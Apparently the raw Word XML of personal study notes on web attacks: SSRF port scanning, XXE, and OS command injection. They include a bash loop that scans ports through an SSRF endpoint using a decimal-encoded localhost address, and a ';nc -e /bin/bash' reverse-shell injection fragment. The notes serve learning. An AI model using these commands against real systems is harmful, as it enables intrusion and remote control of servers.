    <w:p w14:paraId="66156CA5" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Convert code into decimal using script above</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF5EDAD" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BABE9BB" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Bash script – returns of 1042 bytes = open ports, 1045/6 = closed ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D326348" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>for x in {1..65535};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01178B6A" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    do cmd=$(curl -so /dev/null http://10.10.117.193:8000/attack?url=http://2130706433:${x} \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4C1534" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        -w '%{size_download}');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D678D5" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if [ $cmd != 1045 ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E65C05" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        echo "Open port: $x"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A650115" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE77798" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE3CA73" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DA7B84" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Burpsuite Intruder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C13358" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>XXE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDBA03E" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>XML External Entity Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209F4C3B" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>abuses features of XML parsers/data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3C47E1" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>allows attacker to interact with any backend or external systems that the application itself can access and allow attack to read files on system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159E516A" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Cause DoS attacks or SSRF, also port scanning and RCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A61EB4" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Two Types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F4DF5F" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>In-band – attacker receives immediate response to XXE payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D29FC47" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Out-of-Band – Blind XXE – no immediate response from web application and attack has to reflect the output of XXE payload to some other file or server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC0158C" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>eXtensible Markup Language</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A07746E" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>XML – markup language that defines set of rules for encoding documents in a format that is both human and machine readable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0A47E5" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>used for storing/transporting data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34751547" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Why use XML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABE0CA7" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>platform-independent, programming language independent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F81D90" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>data can be changed without affecting presentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4492EE4F" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>allows validation using DTD and Schema – prevents syntax error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CD3419" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>simplifies data sharing between various systems because of independent nature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02549667" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>no conversion required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021A8F71" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFD80FF" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>XML Prolog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4AA826" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A21931F" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>specifies XMl version and the encoding used in XML document</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4515D385" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Root Element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71606530" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. mail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A16D468" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>no root, invalid/wrong</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DF57E5" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>to from subject text – children elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3BDC49" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Case sensitive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327EAC2B" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>can use attributes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409FCAAF" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. &lt;text category = "message"&gt;You need to learn about XXE&lt;/text&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2F65FA" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>DTD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E680FD2" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Document Type Definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6933C99F" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>defines structure and legal elements and attributes of an XML document</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CACCE8" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>XXE Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39238239" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SEE OWASP TOP 10 LESSON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2247A96A" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323B16C8" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE5D73E" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>OS Command Injection occurs when server-side code in a web application makes a system call on hosting machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7F1E2B" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Allows attacker to take advantage of that made system call to execute OS commands on server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB53DBF" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>simple ;nc -e /bin/bash is all that’s needed to reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760EB854" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Blind Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC25698" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>occurs when system call being made does not return response of call to Document Object Model (DOM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1380C43D" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ways to detect Blind Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF5026B" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Ping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6AADCB" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sending pings will cause the page to continue loading until command has completed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569A264D" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>10 pings = 10 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BC44D7" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Redirection of Output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA9E963" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>to a file, then navigate via browser to where file is stored</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006B496B" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>redirect output of id, whoami, netstat, ip addr, etc using “&gt;”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEC482B" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>can confirm Blind Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3999593D" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">tcpdump ip proto </w:t>
      </w:r>
      <w:hyperlink r:id="rId109" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>\\icmp</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> -i tun0 (prep attacker machine for ping command)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B01404E" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
